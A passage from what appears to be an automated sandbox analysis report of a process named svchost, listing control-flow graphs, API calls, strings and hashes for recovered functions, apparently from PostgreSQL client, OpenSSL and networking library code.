1897->1863 1898->1863 1899->1900 1900->1839 1903 7ffda3751fc5-7ffda3751fd1 1900->1903 1904 7ffda3751f60-7ffda3751f6f 1901->1904 1903->1816 1904->1904 1905 7ffda3751f71-7ffda3751f75 1904->1905 1905->1863
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451913259.00007FFDA3731000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA3730000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451887673.00007FFDA3730000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452007956.00007FFDA37B2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452031761.00007FFDA37B3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452057925.00007FFDA37B4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3730000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: inet_pton$SimpleString::operator=inet_ntop
                                                                                            • String ID: .localhost$.onion$.onion.$127.0.0.1$::1$Hostname %s was found in DNS cache$Not resolving .onion address (RFC 7686)$localhost
                                                                                            • API String ID: 1960554822-2421204314
                                                                                            • Opcode ID: 25c6cb95df582e28cec119e56824c6f6e721cbceaf414b25f40c618f8d6cf66f
                                                                                            • Instruction ID: 021c10dd7a5de439bd8e5022caae3d6fdf95936e35aecab5ee68d33929f07d93
                                                                                            • Opcode Fuzzy Hash: 25c6cb95df582e28cec119e56824c6f6e721cbceaf414b25f40c618f8d6cf66f
                                                                                            • Instruction Fuzzy Hash: 0DE1AF62B0A78285FF589B6195603BC37A2EB05B88F048235DE1E677C7DF3ED4568304
                                                                                            Function 00007FFDA3776B40 Relevance: 24.2, APIs: 16, Instructions: 173networkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451913259.00007FFDA3731000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA3730000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451887673.00007FFDA3730000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452007956.00007FFDA37B2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452031761.00007FFDA37B3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452057925.00007FFDA37B4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3730000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: socket$acceptbindconnectgetsocknamehtonllistensendsetsockopt
                                                                                            • String ID:
                                                                                            • API String ID: 3053784475-0
                                                                                            • Opcode ID: edebabe36bea5bcd2954be1afe2cb4534247fba809b7458a7988c1750955324e
                                                                                            • Instruction ID: 708de0fecceb37848322adcba17870c4bb071851ece811acd75a4c63527e9781
                                                                                            • Opcode Fuzzy Hash: edebabe36bea5bcd2954be1afe2cb4534247fba809b7458a7988c1750955324e
                                                                                            • Instruction Fuzzy Hash: 1081CF22B19A8195FB608B64D4647FC3362AB49768F400731DE6D37BDAEF7AD1458304
                                                                                            Function 00007FFDA3612F50 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 73COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ERR_new.LIBCRYPTO-3-X64(00000000,00007FFDA3623D8B,00000000,00007FFDA360ABE9,?,?,?,?,?,00007FFDA360AB6E), ref: 00007FFDA3612F7F
                                                                                            • ERR_set_debug.LIBCRYPTO-3-X64(00000000,00007FFDA3623D8B,00000000,00007FFDA360ABE9,?,?,?,?,?,00007FFDA360AB6E), ref: 00007FFDA3612F97
                                                                                            • ERR_set_error.LIBCRYPTO-3-X64(00000000,00007FFDA3623D8B,00000000,00007FFDA360ABE9,?,?,?,?,?,00007FFDA360AB6E), ref: 00007FFDA3612FA8
                                                                                            • CRYPTO_THREAD_run_once.LIBCRYPTO-3-X64(00000000,00007FFDA3623D8B,00000000,00007FFDA360ABE9,?,?,?,?,?,00007FFDA360AB6E), ref: 00007FFDA3612FE7
                                                                                            • CRYPTO_THREAD_run_once.LIBCRYPTO-3-X64(00000000,00007FFDA3623D8B,00000000,00007FFDA360ABE9,?,?,?,?,?,00007FFDA360AB6E), ref: 00007FFDA3613012
                                                                                            • CRYPTO_THREAD_run_once.LIBCRYPTO-3-X64(00000000,00007FFDA3623D8B,00000000,00007FFDA360ABE9,?,?,?,?,?,00007FFDA360AB6E), ref: 00007FFDA361303B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: D_run_once$R_newR_set_debugR_set_error
                                                                                            • String ID: OPENSSL_init_ssl$ssl\ssl_init.c
                                                                                            • API String ID: 3879570137-538246785
                                                                                            • Opcode ID: e3496e332020ca9c6fe1bb8cde3ecf2beeb22889fd1d9285841be6b611d3b505
                                                                                            • Instruction ID: 1162c579a6cfa829f0bfe3892d441663b11ad716c9af685cca5ae81c6f9ffb92
                                                                                            • Opcode Fuzzy Hash: e3496e332020ca9c6fe1bb8cde3ecf2beeb22889fd1d9285841be6b611d3b505
                                                                                            • Instruction Fuzzy Hash: C7314121B0A10387FB449719E8757B56293AF98380F5C7035D80EA33E7DE2EE945C608
                                                                                            Function 00007FFD947471F0 Relevance: 13.8, APIs: 9, Instructions: 282fileCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451099495.00007FFD94691000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94690000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451064532.00007FFD94690000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451208341.00007FFD94753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451387269.00007FFD948AA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451421580.00007FFD948AD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451454324.00007FFD948AE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451495194.00007FFD948B2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffd94690000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                            • String ID:
                                                                                            • API String ID: 1617910340-0
                                                                                            • Opcode ID: c58fbda7aea8831e34ac238b45014ac4bd6a023c821147c20068f492f0d5de91
                                                                                            • Instruction ID: b5e09a286928f103a6ff16b169f76971e2061fb5c90a13075beef9c564decc07
                                                                                            • Opcode Fuzzy Hash: c58fbda7aea8831e34ac238b45014ac4bd6a023c821147c20068f492f0d5de91
                                                                                            • Instruction Fuzzy Hash: F3C1B232B24A45C6EB20CFB8C4A02BD3762F74AB94F149235DA1E5B796DF38D451C780
                                                                                            Function 00007FFDA36D3BC7 Relevance: 58.1, APIs: 22, Strings: 11, Instructions: 306networkCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 753 7ffda36d3bc7-7ffda36d3bd4 754 7ffda36d3be5-7ffda36d3c66 753->754 755 7ffda36d3bd6-7ffda36d3bdb 753->755 756 7ffda36d3c75-7ffda36d3c80 754->756 757 7ffda36d3c68-7ffda36d3c6e free 754->757 755->754 758 7ffda36d3c82-7ffda36d3c92 756->758 759 7ffda36d3c94-7ffda36d3c98 756->759 757->756 760 7ffda36d3caa-7ffda36d3cc2 call 7ffda36f4cf0 758->760 761 7ffda36d3c9a-7ffda36d3ca6 759->761 762 7ffda36d3ce3 759->762 760->762 768 7ffda36d3cc4-7ffda36d3ccb 760->768 761->760 763 7ffda36d3cea-7ffda36d3d04 socket 762->763 765 7ffda36d3d6b-7ffda36d3d75 call 7ffda36d90d0 763->765 766 7ffda36d3d06-7ffda36d3d1a WSAGetLastError 763->766 774 7ffda36d3d7a-7ffda36d3d7d 765->774 769 7ffda36d3e0a-7ffda36d3e14 766->769 770 7ffda36d3d20-7ffda36d3d2e 766->770 768->763 772 7ffda36d3ccd-7ffda36d3ce1 _strdup 768->772 778 7ffda36d3e20-7ffda36d3e23 769->778 770->769 773 7ffda36d3d34-7ffda36d3d66 call 7ffda36d90d0 call 7ffda36ec450 call 7ffda36e2d70 770->773 772->763 803 7ffda36d4dae-7ffda36d4db8 773->803 775 7ffda36d3dd1-7ffda36d3ddf call 7ffda36f3980 774->775 776 7ffda36d3d7f-7ffda36d3dac setsockopt 774->776 775->778 796 7ffda36d3de1-7ffda36d3df8 WSAGetLastError call 7ffda36ec450 775->796 776->775 779 7ffda36d3dae-7ffda36d3dcf WSAGetLastError call 7ffda36ec450 776->779 782 7ffda36d3e29-7ffda36d3e30 778->782 783 7ffda36d404b-7ffda36d406e connect 778->783 801 7ffda36d3dff-7ffda36d3e05 call 7ffda36e2d70 779->801 784 7ffda36d3e7a-7ffda36d3e92 782->784 785 7ffda36d3e32-7ffda36d3e4b strtol 782->785 789 7ffda36d40c9-7ffda36d40d3 783->789 790 7ffda36d4070-7ffda36d407b WSAGetLastError 783->790 794 7ffda36d3f05-7ffda36d3f0f 784->794 795 7ffda36d3e94-7ffda36d3eba _errno strtol 784->795 791 7ffda36d3e72-7ffda36d3e74 785->791 792 7ffda36d3e4d-7ffda36d3e66 call 7ffda36e2d70 785->792 798 7ffda36d48c9-7ffda36d48d8 789->798 790->798 799 7ffda36d4081-7ffda36d408c WSAGetLastError 790->799 791->783 791->784 792->791 809 7ffda36d3f11-7ffda36d3f27 call 7ffda36da920 794->809 810 7ffda36d3f2e-7ffda36d3f42 call 7ffda36dafa0 794->810 804 7ffda36d3f8d-7ffda36d3fa6 call 7ffda36e2d70 795->804 805 7ffda36d3ec0-7ffda36d3ec9 _errno 795->805 796->801 802 7ffda36d4dba-7ffda36d4e02 call 7ffda36f6230 798->802 798->803 799->798 808 7ffda36d4092-7ffda36d409d WSAGetLastError 799->808 801->769 803->802 830 7ffda36d3f6b-7ffda36d3f78 804->830 805->804 814 7ffda36d3ecf-7ffda36d3ed9 805->814 808->798 820 7ffda36d40a3-7ffda36d40bd WSAGetLastError call 7ffda36d6990 808->820 829 7ffda36d3f29 809->829 809->830 831 7ffda36d3fa8-7ffda36d3faf 810->831 832 7ffda36d3f44-7ffda36d3f66 WSAGetLastError call 7ffda36e2d70 810->832 814->794 824 7ffda36d3edb 814->824 820->789 833 7ffda36d3ee0-7ffda36d3ef0 isspace 824->833 829->810 836 7ffda36d3f84-7ffda36d3f87 830->836 837 7ffda36d3fb5-7ffda36d3fd8 _errno strtol 831->837 838 7ffda36d4048 831->838 832->830 835 7ffda36d3ef6-7ffda36d3f03 833->835 833->836 835->794 835->833 836->794 836->804 839 7ffda36d4019-7ffda36d403c call 7ffda36e2d70 837->839 840 7ffda36d3fda-7ffda36d3fe3 _errno 837->840 838->783 839->838 840->839 841 7ffda36d3fe5-7ffda36d3fef 840->841 841->783 843 7ffda36d3ff1-7ffda36d4001 isspace 841->843 845 7ffda36d4003-7ffda36d4010 843->845 846 7ffda36d4014-7ffda36d4017 843->846 845->843 847 7ffda36d4012 845->847 846->783 846->839 847->783
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast_strdupfreesocket
                                                                                            • String ID: %s(%s) failed: error code %d$SIO_KEEPALIVE_VALS$WSAIoctl$could not create socket: %s$could not set socket to TCP no delay mode: %s$could not set socket to nonblocking mode: %s$invalid integer value "%s" for connection option "%s"$keepalives parameter must be an integer$keepalives_idle$keepalives_interval$tcp_user_timeout
                                                                                            • API String ID: 3112834638-675630034
                                                                                            • Opcode ID: 8cd08dfe8031b0aaf4a845d97061ffdad2b2a9228fa88f5f927dcb7eefd18dce
                                                                                            • Instruction ID: db277ec526c0e442758bc53a2caa8fc617eac54f2b214cea69e65077eef97b99
                                                                                            • Opcode Fuzzy Hash: 8cd08dfe8031b0aaf4a845d97061ffdad2b2a9228fa88f5f927dcb7eefd18dce
                                                                                            • Instruction Fuzzy Hash: 69F1A123B0AA8282F7518F25D4602B833A2FB44B84F5C6131EE4E67396DF3EE585C714
                                                                                            Function 682814A0 Relevance: 51.1, APIs: 27, Strings: 2, Instructions: 312stringCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 848 682814a0-682814c5 849 682814e2-682814f2 strcmp 848->849 850 682814c7 848->850 852 682814d0 849->852 853 682814f4-682814f7 849->853 851 682815e4-682815e7 850->851 857 68281709-6828170c 851->857 858 682815ed-682815f2 851->858 852->851 854 682814d6-682814dc 852->854 855 682814fd-68281504 853->855 856 682816d4-682816d7 853->856 854->849 854->851 861 6828150a-6828151b strcmp 855->861 862 682816f7-68281702 855->862 863 682816dd-682816e4 856->863 864 682815c0-682815cf pthread_rwlock_unlock 856->864 857->864 865 68281712-68281717 857->865 859 682815f8-68281613 strlen malloc 858->859 860 68281782-68281785 858->860 873 682817e8 859->873 874 68281619-68281623 memcpy 859->874 860->865 870 68281787-68281792 860->870 871 682816d0 861->871 872 68281521-68281532 strcmp 861->872 862->863 877 68281704 862->877 875 682816ea-682816f2 863->875 876 6828156e-68281575 863->876 868 68281822-68281840 abort 864->868 869 682815d5-682815e3 864->869 866 68281719-68281734 strlen malloc 865->866 867 68281797-6828179a 865->867 878 6828173a-6828174c memcpy 866->878 879 6828181b-6828181e 866->879 881 6828179c-682817a3 867->881 882 682817a7-682817af 867->882 886 68281849-68281851 868->886 887 68281842-68281845 868->887 870->864 871->856 884 68281538-68281545 872->884 885 68281762-68281770 _strdup 872->885 880 682817f0-682817f3 873->880 883 68281628-68281636 874->883 890 682815b2-682815b4 875->890 888 68281586-68281594 _strdup 876->888 889 68281577-68281584 strcmp 876->889 877->864 878->883 891 68281752-6828175d 878->891 879->873 898 68281820 879->898 880->882 897 682817f5 880->897 881->882 882->864 895 68281638-68281649 strcmp 883->895 896 6828164f-6828165a 883->896 899 6828154f-6828155a 884->899 900 68281547-6828154a free 884->900 893 682816ca-682816cd 885->893 894 68281776 885->894 901 68281852-68281861 pthread_rwlock_wrlock 887->901 902 68281847 887->902 903 6828159a-682815aa free 888->903 904 682817c0 888->904 889->888 905 682815ae 889->905 890->864 892 682815b6-682815bd 890->892 906 68281660-68281667 891->906 892->864 893->871 894->860 895->896 907 682817c7-682817d5 _strdup 895->907 896->906 908 682817fa 896->908 897->864 898->882 899->892 909 6828155c-68281568 899->909 900->899 910 68281881-682818a0 abort 901->910 911 68281863-6828186e call 682814a0 901->911 902->886 903->905 904->907 905->890 915 68281669-68281671 _strdup 906->915 916 6828167a-68281689 906->916 907->896 917 682817db-682817e6 free 907->917 921 68281807-68281812 908->921 909->875 909->876 913 682818a9-682818b1 910->913 914 682818a2-682818a5 910->914 918 68281873-68281880 911->918 919 682818b2-682818c1 pthread_rwlock_wrlock 914->919 920 682818a7 914->920 915->921 922 68281677 915->922 923 6828168f-6828169d strcmp 916->923 924 682817b4-682817b7 916->924 917->873 917->880 925 682818e0-68281910 abort call 682849a0 919->925 926 682818c3-682818df call 682814a0 919->926 920->913 921->917 929 68281814-68281819 free 921->929 922->916 927 6828169f 923->927 928 682816b7-682816bd 923->928 924->904 927->924 932 682816bf-682816c2 928->932 933 682816a4-682816b2 strcmp 928->933 929->917 932->893 933->932 935 682816b4 933->935 935->928
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448609471.0000000068281000.00000020.00000001.01000000.00000011.sdmp, Offset: 68280000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3448572682.0000000068280000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448659941.0000000068296000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448701021.0000000068297000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448746996.00000000682A0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448790248.00000000682A1000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448830797.00000000682A4000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448868542.00000000682A5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448868542.00000000682EC000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_68280000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: strcmp$_strdupfree$abortmallocmemcpystrlen$pthread_rwlock_unlockpthread_rwlock_wrlock
                                                                                            • String ID: 8`)h$pq)h
                                                                                            • API String ID: 1031399696-283867673
                                                                                            • Opcode ID: cb983b356597ae51a9f56790f2f6bd878aa87684a455ba1a6645e18326cee76a
                                                                                            • Instruction ID: 5793e577236a2a3729ad3064a16418873e0c77d2e3cfaac9fddc10f9c11526e5
                                                                                            • Opcode Fuzzy Hash: cb983b356597ae51a9f56790f2f6bd878aa87684a455ba1a6645e18326cee76a
                                                                                            • Instruction Fuzzy Hash: 79A1CEA670579E85EF199F17A90476923A5BB45BC9FC88029DE7A477C0EF38C0D8C300
                                                                                            Function 00007FFDA36D3552 Relevance: 38.9, APIs: 8, Strings: 14, Instructions: 397stringCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1271 7ffda36d3552-7ffda36d355c call 7ffda36e2370 1274 7ffda36d3562 1271->1274 1275 7ffda36d4dae-7ffda36d4db8 1271->1275 1276 7ffda36d3568-7ffda36d3575 1274->1276 1277 7ffda36d4ccd-7ffda36d4cd2 1274->1277 1280 7ffda36d4dba-7ffda36d4e02 call 7ffda36f6230 1275->1280 1279 7ffda36d357a-7ffda36d359d 1276->1279 1277->1280 1285 7ffda36d35cc-7ffda36d35d1 1279->1285 1286 7ffda36d359f-7ffda36d35ab 1279->1286 1287 7ffda36d35d7-7ffda36d35e7 1285->1287 1288 7ffda36d3b13-7ffda36d3b16 1285->1288 1289 7ffda36d35ad-7ffda36d35bd 1286->1289 1290 7ffda36d35bf-7ffda36d35c2 1286->1290 1291 7ffda36d35e9-7ffda36d35f0 1287->1291 1292 7ffda36d360b-7ffda36d361b 1287->1292 1293 7ffda36d3b18-7ffda36d3b50 1288->1293 1294 7ffda36d3b52-7ffda36d3b55 1288->1294 1295 7ffda36d35c5 1289->1295 1290->1295 1291->1275 1296 7ffda36d35f6-7ffda36d35f8 1291->1296 1298 7ffda36d362a-7ffda36d3646 1292->1298 1299 7ffda36d361d-7ffda36d3623 free 1292->1299 1297 7ffda36d3b57-7ffda36d3b97 call 7ffda36d63c0 call 7ffda36dae50 call 7ffda36de5f0 1293->1297 1294->1297 1300 7ffda36d3b9e-7ffda36d3bac 1294->1300 1295->1285 1296->1275 1301 7ffda36d35fe-7ffda36d3608 1296->1301 1297->1300 1303 7ffda36d3648-7ffda36d3660 1298->1303 1304 7ffda36d3673-7ffda36d367e 1298->1304 1299->1298 1305 7ffda36d3bb2-7ffda36d3bc2 1300->1305 1306 7ffda36d4d8e-7ffda36d4d9d call 7ffda36e2d70 1300->1306 1301->1292 1308 7ffda36d3682-7ffda36d3694 1303->1308 1309 7ffda36d3662-7ffda36d3671 memset 1303->1309 1304->1308 1311 7ffda36d488a-7ffda36d48a3 call 7ffda36e2d70 1305->1311 1306->1275 1314 7ffda36d3749 1308->1314 1315 7ffda36d369a-7ffda36d369d 1308->1315 1309->1308 1311->1275 1318 7ffda36d374f-7ffda36d376e call 7ffda36f1830 1314->1318 1315->1314 1319 7ffda36d36a3-7ffda36d36c8 _errno strtol 1315->1319 1329 7ffda36d38b6-7ffda36d38d1 call 7ffda36ee100 1318->1329 1330 7ffda36d3774-7ffda36d3777 1318->1330 1319->1311 1323 7ffda36d36ce-7ffda36d36d7 _errno 1319->1323 1323->1311 1326 7ffda36d36dd-7ffda36d36e7 1323->1326 1327 7ffda36d36e9 1326->1327 1328 7ffda36d371c-7ffda36d3725 1326->1328 1331 7ffda36d36f0-7ffda36d3700 isspace 1327->1331 1328->1318 1332 7ffda36d3727-7ffda36d3744 call 7ffda36e2d70 1328->1332 1348 7ffda36d3ae7-7ffda36d3b0e call 7ffda36f48a0 call 7ffda36e2d70 1329->1348 1349 7ffda36d38d7-7ffda36d38df 1329->1349 1334 7ffda36d385c-7ffda36d387e call 7ffda36ee100 1330->1334 1335 7ffda36d377d-7ffda36d3780 1330->1335 1336 7ffda36d3702-7ffda36d370f 1331->1336 1337 7ffda36d3713-7ffda36d3716 1331->1337 1332->1279 1351 7ffda36d388a-7ffda36d38b1 call 7ffda36f48a0 call 7ffda36e2d70 1334->1351 1352 7ffda36d3880-7ffda36d3888 1334->1352 1341 7ffda36d3786-7ffda36d37b8 call 7ffda36f1830 1335->1341 1342 7ffda36d3852-7ffda36d3857 1335->1342 1336->1331 1345 7ffda36d3711 1336->1345 1337->1311 1337->1328 1358 7ffda36d37c0-7ffda36d37c7 1341->1358 1344 7ffda36d38e5-7ffda36d38f6 1342->1344 1353 7ffda36d38f8-7ffda36d38fb 1344->1353 1354 7ffda36d3911-7ffda36d3929 calloc 1344->1354 1345->1328 1348->1279 1349->1344 1349->1348 1351->1279 1352->1344 1352->1351 1356 7ffda36d3900-7ffda36d390f 1353->1356 1359 7ffda36d48a8-7ffda36d48c4 call 7ffda36e2d70 call 7ffda36ee290 1354->1359 1360 7ffda36d392f-7ffda36d3939 1354->1360 1356->1354 1356->1356 1358->1358 1363 7ffda36d37c9-7ffda36d37cd 1358->1363 1359->1275 1364 7ffda36d393b-7ffda36d393e 1360->1364 1365 7ffda36d3998-7ffda36d39ac call 7ffda36ee290 1360->1365 1369 7ffda36d37fa-7ffda36d3813 call 7ffda36ee100 1363->1369 1370 7ffda36d37cf-7ffda36d37f5 call 7ffda36e2d70 1363->1370 1371 7ffda36d3940-7ffda36d3996 memcpy 1364->1371 1382 7ffda36d3ad2-7ffda36d3ae5 1365->1382 1383 7ffda36d39b2-7ffda36d39bd 1365->1383 1386 7ffda36d3815-7ffda36d381d 1369->1386 1387 7ffda36d3823-7ffda36d384d call 7ffda36f48a0 call 7ffda36e2d70 1369->1387 1370->1279 1371->1365 1371->1371 1382->1293 1383->1382 1385 7ffda36d39c3-7ffda36d39c8 1383->1385 1388 7ffda36d39d0-7ffda36d3acc call 7ffda36eea30 1385->1388 1386->1344 1386->1387 1387->1279 1388->1382
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$callocfreeisspacelibintl_dgettextmemcpymemsetstrtol
                                                                                            • String ID: %s/.s.PGSQL.%d$28P01$57P03$Unix-domain socket path "%s" is too long (maximum %d bytes)$could not parse network address "%s": %s$could not translate Unix-domain socket path "%s" to address: %s$could not translate host name "%s" to address: %s$invalid connection state %d, probably indicative of memory corruption$invalid integer value "%s" for connection option "%s"$invalid port number: "%s"$out of memory$port$server is not in hot standby mode$session is not read-only
                                                                                            • API String ID: 3976168012-2457897468
                                                                                            • Opcode ID: e99a948e3e2966eeb5d8dbe08875eb7888184e898622aa97968327e95bb97c1c
                                                                                            • Instruction ID: 4479073ad8b0b209a592ad6b2e5f2dbadebb7f29bf8c6a2fafa4b159e6fe2762
                                                                                            • Opcode Fuzzy Hash: e99a948e3e2966eeb5d8dbe08875eb7888184e898622aa97968327e95bb97c1c
                                                                                            • Instruction Fuzzy Hash: A312B023B0AA8286F7518F25D4603FC2762FB54B88F586231DE4E27796DF3AE185C704
                                                                                            Function 00007FFDA378D010 Relevance: 33.6, APIs: 9, Strings: 10, Instructions: 367encryptionCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1528 7ffda378d010-7ffda378d05b call 7ffda37901c0 1531 7ffda378d669 1528->1531 1532 7ffda378d061-7ffda378d066 1528->1532 1532->1531 1533 7ffda378d06c-7ffda378d081 1532->1533 1534 7ffda378d0ab-7ffda378d0b2 1533->1534 1535 7ffda378d083-7ffda378d0a5 malloc 1533->1535 1536 7ffda378d0de-7ffda378d0ef 1534->1536 1537 7ffda378d0b4-7ffda378d0d8 malloc 1534->1537 1535->1534 1538 7ffda378d65d 1535->1538 1539 7ffda378d0f1-7ffda378d104 realloc 1536->1539 1540 7ffda378d152-7ffda378d155 1536->1540 1537->1536 1537->1538 1538->1531 1541 7ffda378d106-7ffda378d149 call 7ffda37430a0 call 7ffda3795780 1539->1541 1542 7ffda378d14a-7ffda378d14e 1539->1542 1543 7ffda378d157-7ffda378d184 call 7ffda3738f20 1540->1543 1544 7ffda378d1a2-7ffda378d239 call 7ffda3788060 malloc 1540->1544 1542->1540 1553 7ffda378d18a-7ffda378d18c 1543->1553 1554 7ffda378d3ab-7ffda378d3b1 1543->1554 1544->1538 1551 7ffda378d23f-7ffda378d2ba memmove free 1544->1551 1564 7ffda378d649 1551->1564 1565 7ffda378d2c0-7ffda378d2c7 1551->1565 1556 7ffda378d392-7ffda378d3a1 call 7ffda37430a0 1553->1556 1557 7ffda378d192-7ffda378d195 1553->1557 1558 7ffda378d656 1554->1558 1559 7ffda378d3b7-7ffda378d3c0 1554->1559 1556->1554 1557->1556 1562 7ffda378d19b-7ffda378d19f 1557->1562 1558->1538 1563 7ffda378d3c7-7ffda378d3e7 call 7ffda37430a0 1559->1563 1562->1544 1578 7ffda378d3f1 1563->1578 1568 7ffda378d64d 1564->1568 1569 7ffda378d2cd-7ffda378d2d4 1565->1569 1570 7ffda378d59e-7ffda378d5a3 1565->1570 1568->1558 1572 7ffda378d2d6-7ffda378d2d9 1569->1572 1573 7ffda378d2df-7ffda378d2e1 1569->1573 1574 7ffda378d5a9-7ffda378d5b9 call 7ffda3779b00 1570->1574 1575 7ffda378d632-7ffda378d63b 1570->1575 1572->1573 1572->1574 1576 7ffda378d2e8-7ffda378d2ec 1573->1576 1581 7ffda378d5be-7ffda378d5cb 